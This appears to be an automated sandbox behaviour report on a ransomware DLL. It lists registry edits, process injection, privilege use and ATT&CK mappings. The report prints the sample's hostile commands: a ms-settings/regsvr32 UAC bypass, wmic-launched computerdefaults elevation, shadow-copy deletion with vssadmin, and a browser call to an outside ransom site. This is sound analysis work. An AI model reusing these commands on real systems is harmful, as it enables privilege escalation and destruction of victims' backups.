Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "microsoft.microsoftedge_8wekyb3d8bbwe"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emi = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\User\\Default\\EmieSiteList"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iec = "MicrosoftEdge_iecompatua:"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompatua	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CachePrefix = "iedownload:"	Process not Found

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2420	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2096	rundll32.exe
2096	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3008	Process not Found

Suspicious behavior: MapViewOfSection 10 IoCs

pid	Process
2096	rundll32.exe
2096	rundll32.exe
2096	rundll32.exe
2096	rundll32.exe
2096	rundll32.exe
2096	rundll32.exe
2096	rundll32.exe
2096	rundll32.exe
352	MicrosoftEdgeCP.exe
352	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeIncreaseQuotaPrivilege	852	wmic.exe
Token: SeSecurityPrivilege	852	wmic.exe
Token: SeTakeOwnershipPrivilege	852	wmic.exe
Token: SeLoadDriverPrivilege	852	wmic.exe
Token: SeSystemProfilePrivilege	852	wmic.exe
Token: SeSystemtimePrivilege	852	wmic.exe
Token: SeProfSingleProcessPrivilege	852	wmic.exe
Token: SeIncBasePriorityPrivilege	852	wmic.exe
Token: SeCreatePagefilePrivilege	852	wmic.exe
Token: SeBackupPrivilege	852	wmic.exe
Token: SeRestorePrivilege	852	wmic.exe
Token: SeShutdownPrivilege	852	wmic.exe
Token: SeDebugPrivilege	852	wmic.exe
Token: SeSystemEnvironmentPrivilege	852	wmic.exe
Token: SeRemoteShutdownPrivilege	852	wmic.exe
Token: SeUndockPrivilege	852	wmic.exe
Token: SeManageVolumePrivilege	852	wmic.exe
Token: 33	852	wmic.exe
Token: 34	852	wmic.exe
Token: 35	852	wmic.exe
Token: 36	852	wmic.exe
Token: SeIncreaseQuotaPrivilege	3656	WMIC.exe
Token: SeSecurityPrivilege	3656	WMIC.exe
Token: SeTakeOwnershipPrivilege	3656	WMIC.exe
Token: SeLoadDriverPrivilege	3656	WMIC.exe
Token: SeSystemProfilePrivilege	3656	WMIC.exe
Token: SeSystemtimePrivilege	3656	WMIC.exe
Token: SeProfSingleProcessPrivilege	3656	WMIC.exe
Token: SeIncBasePriorityPrivilege	3656	WMIC.exe
Token: SeCreatePagefilePrivilege	3656	WMIC.exe
Token: SeBackupPrivilege	3656	WMIC.exe
Token: SeRestorePrivilege	3656	WMIC.exe
Token: SeShutdownPrivilege	3656	WMIC.exe
Token: SeDebugPrivilege	3656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3656	WMIC.exe
Token: SeRemoteShutdownPrivilege	3656	WMIC.exe
Token: SeUndockPrivilege	3656	WMIC.exe
Token: SeManageVolumePrivilege	3656	WMIC.exe
Token: 33	3656	WMIC.exe
Token: 34	3656	WMIC.exe
Token: 35	3656	WMIC.exe
Token: 36	3656	WMIC.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3008	Process not Found
2636	MicrosoftEdge.exe
352	MicrosoftEdgeCP.exe
352	MicrosoftEdgeCP.exe
3008	Process not Found
3008	Process not Found

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2096 wrote to memory of 2420	2096	rundll32.exe	69
PID 2096 wrote to memory of 2420	2096	rundll32.exe	69
PID 2096 wrote to memory of 3724	2096	rundll32.exe	70
PID 2096 wrote to memory of 3724	2096	rundll32.exe	70
PID 2096 wrote to memory of 852	2096	rundll32.exe	73
PID 2096 wrote to memory of 852	2096	rundll32.exe	73
PID 2096 wrote to memory of 1460	2096	rundll32.exe	71
PID 2096 wrote to memory of 1460	2096	rundll32.exe	71
PID 2096 wrote to memory of 1044	2096	rundll32.exe	76
PID 2096 wrote to memory of 1044	2096	rundll32.exe	76
PID 1044 wrote to memory of 3656	1044	cmd.exe	78
PID 1044 wrote to memory of 3656	1044	cmd.exe	78
PID 1460 wrote to memory of 1948	1460	cmd.exe	79
PID 1460 wrote to memory of 1948	1460	cmd.exe	79
PID 2388 wrote to memory of 2468	2388	cmd.exe	88
PID 2388 wrote to memory of 2468	2388	cmd.exe	88
PID 2032 wrote to memory of 2196	2032	cmd.exe	89
PID 2032 wrote to memory of 2196	2032	cmd.exe	89
PID 352 wrote to memory of 1044	352	MicrosoftEdgeCP.exe	96
PID 352 wrote to memory of 1044	352	MicrosoftEdgeCP.exe	96
PID 352 wrote to memory of 1044	352	MicrosoftEdgeCP.exe	96
PID 352 wrote to memory of 1044	352	MicrosoftEdgeCP.exe	96
PID 352 wrote to memory of 1044	352	MicrosoftEdgeCP.exe	96
PID 352 wrote to memory of 1044	352	MicrosoftEdgeCP.exe	96

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\c5f402a197a5b61d5b08d2602eb6d4a8.dll,#1
1⤵
- Modifies extensions of user files
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2096
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2420
- C:\Windows\system32\cmd.exe
  cmd /c "start http://54ac6090a47ca27032koxinsnc.bookrow.website/koxinsnc^&1^&42853144^&84^&329^&2215063"
  2⤵
  - Checks computer location settings
  PID:3724
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1948
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1044
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3656

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2196

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2388
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2468

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2000

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2332

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2636

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2824

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:352

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:1044

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2096-120-0x0000015099970000-0x0000015099971000-memory.dmp

Filesize
4KB

Download
memory/2096-116-0x00000150992B0000-0x00000150992B1000-memory.dmp

Filesize
4KB

Download
memory/2096-122-0x000001509CF40000-0x000001509CF45000-memory.dmp

Filesize
20KB

Download
memory/2096-124-0x0000015099990000-0x0000015099991000-memory.dmp

Filesize
4KB

Download
memory/2096-123-0x0000015099980000-0x0000015099981000-memory.dmp

Filesize
4KB

Download
memory/2096-126-0x00000150999E0000-0x00000150999E1000-memory.dmp

Filesize
4KB

Download
memory/2096-125-0x00000150999D0000-0x00000150999D1000-memory.dmp

Filesize
4KB

Download
memory/2096-127-0x00000150999F0000-0x00000150999F1000-memory.dmp

Filesize
4KB

Download
memory/2096-128-0x0000015099A00000-0x0000015099A01000-memory.dmp

Filesize
4KB

Download
memory/2096-137-0x000001509EA60000-0x000001509EA61000-memory.dmp

Filesize
4KB

Download
memory/2096-121-0x000001509CF30000-0x000001509CF31000-memory.dmp

Filesize
4KB

Download
memory/2096-115-0x00000150994C0000-0x0000015099969000-memory.dmp

Filesize
4.7MB

Download
memory/2096-119-0x00000150992E0000-0x00000150992E1000-memory.dmp

Filesize
4KB

Download
memory/2096-118-0x00000150992D0000-0x00000150992D1000-memory.dmp

Filesize
4KB

Download
memory/2096-117-0x00000150992C0000-0x00000150992C1000-memory.dmp

Filesize
4KB

Download
memory/3744-140-0x0000014363560000-0x0000014363568000-memory.dmp

Filesize
32KB

Download